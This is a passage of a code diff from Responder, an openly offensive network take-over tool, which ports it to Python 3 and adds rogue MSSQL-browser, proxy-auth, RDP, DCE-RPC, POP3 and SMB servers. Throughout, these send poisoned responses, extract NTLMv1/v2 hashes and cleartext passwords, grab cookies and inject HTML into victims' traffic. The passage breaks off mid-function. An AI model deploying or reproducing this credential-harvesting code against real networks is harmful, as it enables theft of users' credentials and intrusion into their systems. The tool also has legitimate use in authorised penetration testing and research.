-			print text("[MSSQL] Received connection from %s" % self.client_address[0])
 	
 		try:
+			self.ntry = 0
 			while True:
 				data = self.request.recv(1024)
-				self.request.settimeout(0.1)
+				self.request.settimeout(1)
+				Challenge = RandomChallenge()
 
-
-				if data[0] == "\x12":  # Pre-Login Message
+				if not data:
+					break
+				if settings.Config.Verbose:
+					print(text("[MSSQL] Received connection from %s" % self.client_address[0]))
+				if data[0] == b"\x12" or data[0] == 18:  # Pre-Login Message
 					Buffer = str(MSSQLPreLoginAnswer())
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
 
-				if data[0] == "\x10":  # NegoSSP
-					if re.search("NTLMSSP",data):
-						Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
+				if data[0] == b"\x10" or data[0] == 16:  # NegoSSP
+					if re.search(b'NTLMSSP',data):
+						Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 						Packet.calculate()
 						Buffer = str(Packet)
-						self.request.send(Buffer)
+						self.request.send(NetworkSendBufferPython2or3(Buffer))
 						data = self.request.recv(1024)
 					else:
 						ParseClearTextSQLPass(data,self.client_address[0])
 
-				if data[0] == "\x11":  # NegoSSP Auth
-					ParseSQLHash(data,self.client_address[0])
+				if data[0] == b'\x11' or data[0] == 17:  # NegoSSP Auth
+					ParseSQLHash(data,self.client_address[0],Challenge)
 
-		except socket.timeout:
-			self.request.close()
+		except:
+			pass
+
+# MSSQL Server Browser class
+# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
+class MSSQLBrowser(BaseRequestHandler):
+	def handle(self):
+		if settings.Config.Verbose:
+			print(text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0]))
+
+		data, soc = self.request
+
+		if data:
+			if data[0] in b'\x02\x03': # CLNT_BCAST_EX / CLNT_UCAST_EX
+				self.send_response(soc, "MSSQLSERVER")
+			elif data[0] == b'\x04': # CLNT_UCAST_INST
+				self.send_response(soc, data[1:].rstrip("\x00"))
+			elif data[0] == b'\x0F': # CLNT_UCAST_DAC
+				self.send_dac_response(soc)
+
+	def send_response(self, soc, inst):
+		print(text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0]))
+
+		server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
+		resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
+		soc.sendto(struct.pack("<BH", 0x05, len(resp)) + NetworkSendBufferPython2or3(resp), self.client_address)
+
+	def send_dac_response(self, soc):
+		print(text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0]))
+
+		soc.sendto(NetworkSendBufferPython2or3(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433)), self.client_address)

servers/POP3.py

@@ -15,25 +15,33 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from SocketServer import BaseRequestHandler
-from packets import POPOKPacket
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import POPOKPacket,POPNotOKPacket
 
 # POP3 Server class
 class POP3(BaseRequestHandler):
 	def SendPacketAndRead(self):
 		Packet = POPOKPacket()
-		self.request.send(str(Packet))
+		self.request.send(NetworkSendBufferPython2or3(Packet))
 		return self.request.recv(1024)
 
 	def handle(self):
 		try:
 			data = self.SendPacketAndRead()
-
-			if data[0:4] == "USER":
-				User = data[5:].replace("\r\n","")
+			if data[0:4] == b'CAPA':
+				self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket()))
+				data = self.request.recv(1024)
+			if data[0:4] == b'AUTH':
+				self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket()))
+				data = self.request.recv(1024)
+			if data[0:4] == b'USER':
+				User = data[5:].strip(b"\r\n").decode("latin-1")
 				data = self.SendPacketAndRead()
-			if data[0:4] == "PASS":
-				Pass = data[5:].replace("\r\n","")
+			if data[0:4] == b'PASS':
+				Pass = data[5:].strip(b"\r\n").decode("latin-1")
 
 				SaveToDb({
 					'module': 'POP3', 

servers/Proxy_Auth.py

@@ -0,0 +1,143 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from servers.HTTP import ParseHTTPHash
+from packets import *
+
+def GrabUserAgent(data):
+	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+	if UserAgent:
+		print(text("[Proxy-Auth] %s" % color("User-Agent        : "+UserAgent[0], 2)))
+
+def GrabCookie(data):
+	Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
+
+	if Cookie:
+		Cookie = Cookie.group(0).replace('Cookie: ', '')
+		if len(Cookie) > 1:
+			if settings.Config.Verbose:
+				print(text("[Proxy-Auth] %s" % color("Cookie           : "+Cookie, 2)))
+
+		return Cookie
+	return False
+
+def GrabHost(data):
+	Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
+
+	if Host:
+		Host = Host.group(0).replace('Host: ', '')
+		if settings.Config.Verbose:
+			print(text("[Proxy-Auth] %s" % color("Host             : "+Host, 2)))
+
+		return Host
+	return False
+
+def PacketSequence(data, client, Challenge):
+	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)	
+	if NTLM_Auth:
+		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+		if Packet_NTLM == b'\x01':
+			if settings.Config.Verbose:
+				print(text("[Proxy-Auth] Sending NTLM authentication request to %s" % client))
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+			Buffer.calculate()
+			Buffer_Ans =  WPAD_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
+			NTLM_Auth = b64decode(''.join(NTLM_Auth))
+			ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth")
+			GrabUserAgent(data)
+			GrabCookie(data)
+			GrabHost(data)
+			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) #While at it, grab some SMB hashes...
+			Buffer.calculate()
+			return Buffer
+		else:
+               		return IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)# Didn't work? no worry, let's grab hashes via SMB...
+
+	elif Basic_Auth:
+		GrabUserAgent(data)
+		GrabCookie(data)
+		GrabHost(data)
+		ClearText_Auth = b64decode(''.join(Basic_Auth).encode('latin-1'))
+		SaveToDb({
+			'module': 'Proxy-Auth', 
+			'type': 'Basic', 
+			'client': client, 
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
+			})
+
+		return False
+	else:
+		if settings.Config.Basic:
+			Response = WPAD_Basic_407_Ans()
+			if settings.Config.Verbose:
+				print(text("[Proxy-Auth] Sending BASIC authentication request to %s" % client))
+
+		else:
+			Response = WPAD_Auth_407_Ans()
+
+		return str(Response)
+
+class Proxy_Auth(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+
+		except:
+			pass
+
+

servers/RDP.py

@@ -0,0 +1,142 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import re
+import ssl
+import codecs
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import TPKT, X224, RDPNEGOAnswer, RDPNTLMChallengeAnswer
+
+cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+
+def ParseNTLMHash(data,client, Challenge):  #Parse NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
+
+	if NthashLen == 24:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
+
+		SaveToDb({
+			'module': 'RDP', 
+			'type': 'NTLMv1-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 60:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+
+		SaveToDb({
+			'module': 'RDP', 
+			'type': 'NTLMv2-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+
+def FindNTLMNegoStep(data):
+	NTLMStart  = data.find(b'NTLMSSP')
+	NTLMString = data[NTLMStart:]
+	NTLMStep = NTLMString[8:12]
+	if NTLMStep == b'\x01\x00\x00\x00':
+		return NTLMStep
+	if NTLMStep == b'\x03\x00\x00\x00':
+		return NTLMStep
+	else:
+		return False
+
+class RDP(BaseRequestHandler):
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			self.request.settimeout(30)
+			Challenge = RandomChallenge()
+
+			if data[11:12] == b'\x01':
+				x =  X224(Data=RDPNEGOAnswer())
+				x.calculate()
+				h = TPKT(Data=x)
+				h.calculate()
+				buffer1 = str(h)
+				self.request.send(NetworkSendBufferPython2or3(buffer1))
+				SSLsock = ssl.wrap_socket(self.request, certfile=cert, keyfile=key, ssl_version=ssl.PROTOCOL_TLS,server_side=True)
+				SSLsock.settimeout(30)
+				data = SSLsock.read(8092)
+				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
+					x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					x.calculate()
+					SSLsock.write(NetworkSendBufferPython2or3(x))
+					data = SSLsock.read(8092)
+					if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
+						ParseNTLMHash(data,self.client_address[0], Challenge)
+
+			##Sometimes a client sends a routing cookie; we don't want to miss that let's look at it the other way around..
+			if data[len(data)-4:] == b'\x03\x00\x00\x00':
+				x =  X224(Data=RDPNEGOAnswer())
+				x.calculate()
+				h = TPKT(Data=x)
+				h.calculate()
+				buffer1 = str(h)
+				self.request.send(NetworkSendBufferPython2or3(buffer1))
+				data = self.request.recv(8092)
+
+				SSLsock = ssl.wrap_socket(self.request, certfile=cert, keyfile=key, ssl_version=ssl.PROTOCOL_TLS,server_side=True)
+				data = SSLsock.read(8092)
+				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
+					x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					x.calculate()
+					SSLsock.write(NetworkSendBufferPython2or3(x))
+					data = SSLsock.read(8092)
+					if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
+						ParseNTLMHash(data,self.client_address[0], Challenge)
+
+			else:
+				return False
+		except:
+			pass

servers/RPC.py

@@ -0,0 +1,214 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import re
+import ssl
+import codecs
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import RPCMapBindAckAcceptedAns, RPCMapBindMapperAns, RPCHeader, NTLMChallenge, RPCNTLMNego
+
+NDR = "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" #v2
+Map = "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36" #v1
+MapBind = "\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa"
+
+#for mapper
+DSRUAPI  = "\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2"  #v4
+LSARPC   = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab" #v0
+NETLOGON = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb" #v1
+WINSPOOL = "\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09" #v1
+
+
+
+def Chose3264x(packet):
+	if Map32 in packet:
+		return Map32
+	else:
+		return Map64
+
+def FindNTLMOpcode(data):
+	SSPIStart  = data.find(b'NTLMSSP')
+	if SSPIStart is -1:
+		return False
+	SSPIString = data[SSPIStart:]
+	return SSPIString[8:12]
+
+def ParseRPCHash(data,client, Challenge):  #Parse NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
+
+	if NthashLen == 24:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
+
+		SaveToDb({
+			'module': 'DCE-RPC', 
+			'type': 'NTLMv1-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 60:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+
+		SaveToDb({
+			'module': 'DCE-RPC', 
+			'type': 'NTLMv2-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+class RPCMap(BaseRequestHandler):
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			self.request.settimeout(5)
+			Challenge = RandomChallenge()
+			if data[0:3] == b"\x05\x00\x0b":#Bind Req.
+				#More recent windows version can and will bind on port 135...Let's grab it.
+				if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+					n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					n.calculate()
+					RPC = RPCNTLMNego(Data=n)
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					data = self.request.recv(1024)
+
+					if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+						ParseRPCHash(data, self.client_address[0], Challenge)
+						self.request.close()
+
+				if NetworkSendBufferPython2or3(Map) in data:# Let's redirect to Mapper.
+					RPC = RPCMapBindAckAcceptedAns(CTX1UID=Map, CTX1UIDVersion="\x01\x00\x00\x00",CallID=NetworkRecvBufferPython2or3(data[12:16]))
+
+
+				if NetworkSendBufferPython2or3(NDR) in data and NetworkSendBufferPython2or3(Map) not in data: # Let's redirect to Mapper.
+					RPC = RPCMapBindAckAcceptedAns(CTX1UID=NDR, CTX1UIDVersion="\x02\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+
+
+				RPC.calculate()
+				self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+				data = self.request.recv(1024)
+
+			if data[0:3] == b"\x05\x00\x00":#Mapper Response.
+
+				# DSRUAPI
+				if NetworkSendBufferPython2or3(DSRUAPI) in data:
+					x = RPCMapBindMapperAns()
+					x.calculate()
+					RPC =  RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					data = self.request.recv(1024)
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto DSRUAPI auth server." % (self.client_address[0]), 3, 1))
+					self.request.close()
+
+				#LSARPC
+				if NetworkSendBufferPython2or3(LSARPC) in data:
+					x = RPCMapBindMapperAns(Tower1UID=LSARPC,Tower1Version="\x00\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
+					x.calculate()
+					RPC =  RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					data = self.request.recv(1024)
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto LSARPC auth server." % (self.client_address[0]), 3, 1))
+					self.request.close()
+
+				#WINSPOOL
+				if NetworkSendBufferPython2or3(WINSPOOL) in data:
+					x = RPCMapBindMapperAns(Tower1UID=WINSPOOL,Tower1Version="\x01\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
+					x.calculate()
+					RPC =  RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					data = self.request.recv(1024)
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto WINSPOOL auth server." % (self.client_address[0]), 3, 1))
+					self.request.close()
+
+				#NetLogon
+				if NetworkSendBufferPython2or3(NETLOGON) in data:
+					self.request.close()
+					# For now, we don't want to establish a secure channel... we want NTLM.
+
+					#x = RPCMapBindMapperAns(Tower1UID=NETLOGON,Tower1Version="\x01\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
+					#x.calculate()
+					#RPC =  RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					#RPC.calculate()
+					#self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					#data = self.request.recv(1024)
+					#print(color("[*] [DCE-RPC Mapper] Redirected %-15sto NETLOGON auth server." % (self.client_address[0]), 3, 1))
+
+		except Exception:
+			self.request.close()
+			pass
+
+
+
+class RPCMapper(BaseRequestHandler):
+	def handle(self):
+		try:
+			data = self.request.recv(2048)
+			self.request.settimeout(3)
+			Challenge = RandomChallenge()
+
+			if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+				n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+				n.calculate()
+				RPC = RPCNTLMNego(Data=n)
+				RPC.calculate()
+				self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+				data = self.request.recv(1024)
+
+			if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+				ParseRPCHash(data, self.client_address[0], Challenge)
+				self.request.close()
+
+		except Exception:
+			self.request.close()
+			pass
+
+

servers/SMB.py

@@ -14,12 +14,15 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct, re
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from random import randrange
 from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data
-from SocketServer import BaseRequestHandler
-from utils import *
-import struct
-import re
 
 
 def Is_Anonymous(data):  # Detect if SMB auth was Anonymous
@@ -43,30 +46,25 @@ def Parse_Nego_Dialect(data):
 		if Dialect[i] == 'NT LM 0.12':
 			return chr(i) + '\x00'
 
-
 def midcalc(data):  #Set MID SMB Header field.
     return data[34:36]
 
-
-
 def uidcalc(data):  #Set UID SMB Header field.
     return data[32:34]
 
-
 def pidcalc(data):  #Set PID SMB Header field.
     pack=data[30:32]
     return pack
 
-
 def tidcalc(data):  #Set TID SMB Header field.
     pack=data[28:30]
     return pack
 
 def ParseShare(data):
 	packet = data[:]
-	a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
+	a = re.search(b'(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
 	if a:
-		print text("[SMB] Requested Share     : %s" % a.group(0).decode('UTF-16LE'))
+		print(text("[SMB] Requested Share     : %s" % a.group(0).decode('UTF-16LE')))
 
 def GrabMessageID(data):
     Messageid = data[28:36]
@@ -74,8 +72,8 @@ def GrabMessageID(data):
 
 def GrabCreditRequested(data):
     CreditsRequested = data[18:20]
-    if CreditsRequested == "\x00\x00":
-       CreditsRequested =  "\x01\x00"
+    if CreditsRequested == b'\x00\x00':
+       CreditsRequested =  b'\x01\x00'
     else:
        CreditsRequested = data[18:20]
     return CreditsRequested
@@ -88,34 +86,26 @@ def GrabSessionID(data):
     SessionID = data[44:52]
     return SessionID
 
-def ParseSMBHash(data,client):  #Parse SMB NTLMSSP v1/v2
-	SecBlobLen = struct.unpack('<H',data[51:53])[0]
-	BccLen     = struct.unpack('<H',data[61:63])[0]
-
-	if SecBlobLen < 260:
-		SSPIStart    = data[75:]
-		LMhashLen    = struct.unpack('<H',data[89:91])[0]
-		LMhashOffset = struct.unpack('<H',data[91:93])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		NthashLen    = struct.unpack('<H',data[97:99])[0]
-		NthashOffset = struct.unpack('<H',data[99:101])[0]
-	else:
-		SSPIStart    = data[79:]
-		LMhashLen    = struct.unpack('<H',data[93:95])[0]
-		LMhashOffset = struct.unpack('<H',data[95:97])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		NthashLen    = struct.unpack('<H',data[101:103])[0]
-		NthashOffset = struct.unpack('<H',data[103:105])[0]
+def ParseSMBHash(data,client, Challenge):  #Parse SMB NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
 
 	if NthashLen == 24:
-		SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		DomainLen    = struct.unpack('<H',data[105:107])[0]
-		DomainOffset = struct.unpack('<H',data[107:109])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
-		UserLen      = struct.unpack('<H',data[113:115])[0]
-		UserOffset   = struct.unpack('<H',data[115:117])[0]
-		Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
 
 		SaveToDb({
 			'module': 'SMB', 
@@ -127,14 +117,15 @@ def ParseSMBHash(data,client):  #Parse SMB NTLMSSP v1/v2
 		})
 
 	if NthashLen > 60:
-		SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		DomainLen    = struct.unpack('<H',data[109:111])[0]
-		DomainOffset = struct.unpack('<H',data[111:113])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
